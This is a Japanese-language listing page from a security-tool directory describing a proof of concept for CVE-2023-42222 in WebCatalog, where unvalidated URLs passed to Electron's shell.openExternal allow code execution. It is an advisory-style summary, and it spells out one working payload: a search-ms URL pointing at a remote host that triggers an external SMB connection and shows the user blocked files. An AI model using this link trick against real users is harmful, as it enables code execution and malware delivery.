Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-42222 — WebCatalogにおけるCVE-2023-42222の概念実証エクスプロイト。Electronのshell.openExternalを介して任意のURL実行を示し、セキュリティ保護を回避してコードを実行する。 | Kitploit
ツール/GitHubGitHub/itssixtyn3in/cve-2023-42222
脆弱性分析エクスプロイトウェブアプリケーション悪用論文と研究学習と教育
GitHubitssixtyn3in/cve-2023-42222

CVE-2023-42222

WebCatalogにおけるCVE-2023-42222の概念実証エクスプロイト。Electronのshell.openExternalを介して任意のURL実行を示し、セキュリティ保護を回避してコードを実行する。

リポジトリを見る
3122年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-42222

脆弱性の概要

WebCatalog バージョン 48.4.0 より前のバージョンでは、特定の状況下で、URL が http または https リソースであることを検証せずに Electron の shell.openExternal 関数を呼び出します。この脆弱性により、攻撃者は任意のプロトコルを含むリンクを含むメッセージを送信することで、被害者のマシン上でコードを実行できます。被害者はリンクを操作する必要があり、開かれる URL を確認します。

脆弱性スキャンの出力

SAST

PoC の概要

PoC

PoC 情報

この脆弱性は、任意の URL を許可するページを同期することで確認できます。search-ms://query=PsExec.exe&crumb=location://live.sysinternals.com/tools を含むウェブサイトが同期されると、外部 SMB 接続が作成されます。これを使用して、ローカルマシン上のセキュリティ保護をバイパスし、通常はブロックされる悪意のあるファイルをユーザーに提示できます。

ツールをダウンロード